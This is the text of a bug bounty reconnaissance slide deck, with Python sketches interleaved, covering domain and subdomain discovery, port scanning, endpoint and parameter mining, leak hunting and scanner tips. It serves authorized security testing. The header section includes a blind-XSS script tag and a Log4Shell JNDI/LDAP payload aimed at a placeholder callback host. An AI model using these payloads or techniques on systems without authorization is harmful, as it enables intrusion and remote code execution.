Bug bounty recon
@blindu_ch
https://www.blindu.ch
Eusebiu Daniel Blindu
Context is everything
● Recon is an iterative process
● Recon depends on the bug bounty program
● Recon depends on the scope (limitations)
Finding domains in scope
● Whois lookup
● Google search site:whois.* inurl:domain.com “org: Domain”
● Hurricane Electric (bgp.he.net)
● Shodan/Censys.io
● Acquisitions (crunchbase.com)
● Current and historic databases, documents, leaks and investigations
(aleph.occrp.org)
● Website profiler, lead generation, competitive analysis and business intelligence tools
(builtwith.com)
● IP ranges -> reverse dns -> domains/subdomains
● Domain search engines ( whoxy.com )
● Online scanning tools (kaeferjaeger.gay)
● SSL Certificate info
● Crawling the known domains/subdomains (Acunetix Discovery)
● https://dns.coffee/
● Amass (https://github.com/owasp-amass/amass ) `amass intel -org 'Netflix'`
● Github
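The "IP ranges -> reverse DNS -> domains/subdomains" step above can be sketched in Python. This is a minimal sketch: the CIDR used in the comment is the RFC 5737 documentation range, a placeholder for a real in-scope range.

```python
import ipaddress
import socket

def expand_cidr(cidr: str) -> list[str]:
    """All usable host addresses in a CIDR range."""
    return [str(ip) for ip in ipaddress.ip_network(cidr).hosts()]

def reverse_dns_sweep(cidr: str) -> dict[str, str]:
    """Map IP -> PTR hostname for every IP in the range that has one.

    Lookups that fail (no PTR record, timeout) are skipped.
    """
    results = {}
    for ip in expand_cidr(cidr):
        try:
            hostname, _, _ = socket.gethostbyaddr(ip)
            results[ip] = hostname
        except OSError:  # herror/gaierror are OSError subclasses
            continue
    return results

# reverse_dns_sweep("192.0.2.0/28")  # placeholder range; use an in-scope one
```

The hostnames that come back often reveal apex domains the program owns but never advertised.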
Finding subdomains
● Existing tools: subfinder/sublist3r/amass
● Brute force subdomain scanner
● Crawling the known domains/subdomains that belong to same organization
● https://crt.sh/?q=domain.com
● https://securitytrails.com/list/apex_domain/domain.com
● https://www.shodan.io/search?query=ssl.cert.subject.CN%3Adomain.com
● Censys.io
● https://lab.dynamite.ai/ (search in public pcap files)
● Github
● Google/Bing search ‘site:domain.com’
● IP ranges -> reverse DNS
● https://github.com/iamthefrogy/frogy
● https://github.com/Cyber-Guy1/domainCollector
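The brute-force subdomain scanner mentioned above boils down to two steps: build candidates from a wordlist, then keep the ones that resolve. A minimal sketch (the tiny wordlist here is illustrative; real scans use lists of tens of thousands of entries):

```python
import socket

# Illustrative wordlist only; swap in a real one (e.g. from SecLists).
WORDLIST = ["www", "mail", "dev", "staging", "api", "vpn", "test"]

def candidates(apex: str, words=WORDLIST) -> list[str]:
    """Build candidate subdomain names from a wordlist."""
    return [f"{w}.{apex}" for w in words]

def resolves(name: str) -> bool:
    """True if the name resolves to at least one A/AAAA address."""
    try:
        socket.getaddrinfo(name, None)
        return True
    except socket.gaierror:
        return False

# live = [c for c in candidates("domain.com") if resolves(c)]
```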
Cleaning
● Clean subdomains by IP (keep at most 1 to 3 subdomains that share the same IP - with exceptions)
● Check the wildcard subdomains if it makes sense to continue with some of them
● sort | uniq
● Grab screenshots or other techniques to group similar subdomains together to remove duplicate content
● Subdomains that don’t resolve to a (public) IP: keep them, but in a separate list from the main one
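The "keep at most 1-3 subdomains per IP" cleaning step above can be sketched like this (a minimal sketch; it assumes you already resolved each subdomain to an IP):

```python
from collections import defaultdict

def dedupe_by_ip(resolved: dict[str, str], keep: int = 3):
    """Keep at most `keep` subdomains per IP; return (kept, dropped).

    `resolved` maps subdomain -> IP. Subdomains sharing an IP are often
    the same app behind one host, but keep a few in case of vhost routing.
    """
    by_ip = defaultdict(list)
    for sub, ip in sorted(resolved.items()):
        by_ip[ip].append(sub)
    kept, dropped = [], []
    for subs in by_ip.values():
        kept.extend(subs[:keep])
        dropped.extend(subs[keep:])
    return kept, dropped
```

Keep the dropped list around too, per the exceptions noted above.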
Optional but useful: Continuous asset monitoring
Advantages: some assets (domains, subdomains, ports) may only be exposed at certain times (batch jobs,
deploys, test/UAT/staging/QA environments) - and may have weaker security, exposing sensitive data
Disadvantages: can be costly to implement
Port scanning
Nmap - main tool
cat subdomains.txt | httpx -o subdomains_live.txt
naabu -list subdomains.txt -top-ports 1000 -exclude-port 80,443,21,22,25 -o ports.txt
Some public/paid online services keep port scan data up to date
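Under the hood, tools like naabu and `nmap -sT` do a TCP connect per port. A minimal single-port sketch of that check:

```python
import socket

def port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """TCP connect check for a single port (the -sT style probe)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, timed out, unreachable
        return False
```

Real scanners parallelize this heavily and add SYN scanning; use nmap/naabu for actual work, but this shows what a "port is open" result means.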
Collecting URL endpoints
● Tools: waybackurls, gau
● Websites: urlscan.io, web.archive.org
● Google/Bing dorking site:domain.com
● Crawling: Scanners (Burp Suite crawl, Acunetix) hakrawler, Xenu
● Brute force: ffuf, dirbuster
● Javascript .js file source code
● Github
● Android/iOS mobile app
● Desktop app
● Public pcap files (lab.dynamite.ai)
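Mining .js source for endpoints, as listed above, is mostly regex work. A minimal sketch (the pattern is deliberately rough; real tools like LinkFinder use broader patterns):

```python
import re

# Rough pattern: quoted relative paths or absolute URLs inside JS source.
PATH_RE = re.compile(r"""["'](/[A-Za-z0-9_\-./]+|https?://[^"']+)["']""")

def endpoints_from_js(js_source: str) -> list[str]:
    """Pull likely URL endpoints out of a .js file's source code."""
    return sorted(set(PATH_RE.findall(js_source)))
```

Feed the output straight into your URL list for the target.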
Search backup/source code files
For https://subdomain.domain.com/ search for:
● https://subdomain.domain.com/subdomain.zip , https://subdomain.domain.com/subdomain.tar.gz,
● https://subdomain.domain.com/domain.zip, https://subdomain.domain.com/domain.tar.gz
● https://subdomain.domain.com/subdomain/subdomain.zip,
https://subdomain.domain.com/subdomain/subdomain.tar.gz
● https://subdomain.domain.com/domain/domain.zip,
https://subdomain.domain.com/domain/domain.tar.gz
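The candidate backup URLs listed above follow a fixed pattern, so they are easy to generate. A minimal sketch (naive hostname split, no public-suffix handling; `sub.example.com` in the comment is a placeholder):

```python
from urllib.parse import urlparse

EXTENSIONS = (".zip", ".tar.gz")

def backup_candidates(url: str) -> list[str]:
    """Build the backup-archive guesses above for a given URL.

    For https://subdomain.domain.com/ the subdomain label is 'subdomain'
    and the registered-name guess is 'domain' (naive split, no PSL).
    """
    host = urlparse(url).hostname
    labels = host.split(".")
    sub, dom = labels[0], labels[-2]
    base = f"https://{host}"
    out = []
    for name in (sub, dom):
        for ext in EXTENSIONS:
            out.append(f"{base}/{name}{ext}")
            out.append(f"{base}/{name}/{name}{ext}")
    return out
```

Request each candidate and flag anything that returns a 200 with an archive content type.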
Parameter mining
● Arjun
● ParamSpider
● Param-Miner (Burp)
● ffuf can also be used for parameter discovery
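Tools like Arjun probe many candidate parameters per request, then narrow down whichever batch changes the response. A minimal sketch of the batching step only (request sending and response diffing left out; "canary" is an arbitrary marker value):

```python
from urllib.parse import urlencode

def param_batches(wordlist: list[str], size: int = 50) -> list[str]:
    """Split candidate parameter names into batched query strings.

    Each batch gets sent as one request; a response that differs from
    the baseline means some param in that batch is live - bisect it.
    """
    batches = []
    for i in range(0, len(wordlist), size):
        chunk = wordlist[i:i + size]
        batches.append(urlencode({p: "canary" for p in chunk}))
    return batches
```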
Leaks finding
● gist.github.com
● Gitlab.com
● site:docs.google.com/spreadsheets “company name”
● site:groups.google.com “company name”
● Javascript files .js
● Android/iOS source code
● Pcap uploaded by mistake publicly https://lab.dynamite.ai/
One bug found -> scan all your BB subdomains
● Keep a large list of subdomains/URLs for multiple BB programs (preferably in a database)
● Once you find a bug, scan all the stored URLs for the same bug
● This can also lead you to your next favourite bounty program
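The database suggested above can be as small as one sqlite table keyed by program. A minimal sketch (in-memory for illustration; the program names in the test are hypothetical; pass a file path to persist):

```python
import sqlite3

def make_db(path: str = ":memory:") -> sqlite3.Connection:
    """Open (or create) the URL store."""
    db = sqlite3.connect(path)
    db.execute("CREATE TABLE IF NOT EXISTS urls (program TEXT, url TEXT)")
    return db

def add_url(db: sqlite3.Connection, program: str, url: str) -> None:
    db.execute("INSERT INTO urls VALUES (?, ?)", (program, url))

def all_urls(db: sqlite3.Connection) -> list[str]:
    """Once a bug is found, re-test it against every stored URL."""
    return [row[0] for row in db.execute("SELECT url FROM urls")]
```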
HTTP headers - manipulation
● Burp Proxy match/replace functionality
● Blind XSS/Log4Shell - User-Agent/Referer headers
● Modify response code
● Check for reverse proxy `GET https://burpcollab HTTP/1.1`
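Outside of Burp match/replace, the same header injection can be scripted. A minimal sketch building (not sending) a request with blind-XSS and Log4Shell style payloads; the callback host is a placeholder for your own Burp Collaborator / OAST domain:

```python
import urllib.request

# Placeholder; replace with your Collaborator/OAST callback domain.
CALLBACK = "example.oast.example"

def tainted_request(url: str) -> urllib.request.Request:
    """Build a request with payloads in User-Agent and Referer."""
    req = urllib.request.Request(url)
    req.add_header("User-Agent", f'"><script src=https://{CALLBACK}/x.js></script>')
    req.add_header("Referer", f"${{jndi:ldap://{CALLBACK}/a}}")
    return req

# urllib.request.urlopen(tainted_request("https://target.example/")) would send it.
```

A callback hitting your OAST domain later means some backend logged or rendered the header.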
Scanner tips
● Feed previous gathered endpoints for a target to the scanner, not only the base url
● Combine tools: Use Acunetix/nuclei/ZAP via Burp Proxy/Fiddler with match/replace
● Intercept mobile app traffic, feed the scanner those requests
● Parse public pcap files for requests, feed the scanner
● Intercept SmartTV network traffic, feed the scanner
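Feeding intercepted traffic to a scanner means turning each raw captured request into something replayable. A minimal sketch that parses one raw HTTP/1.1 request (as exported from a pcap or proxy) into method, path, headers and body:

```python
def parse_raw_request(raw: str) -> dict:
    """Parse a raw HTTP request into pieces a scanner can replay.

    Assumes a well-formed HTTP/1.1 request with CRLF line endings.
    """
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ")
    headers = dict(line.split(": ", 1) for line in lines[1:])
    return {"method": method, "path": path, "headers": headers, "body": body}
```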
Thank you!
@blindu_ch
https://www.blindu.ch
Eusebiu Daniel Blindu
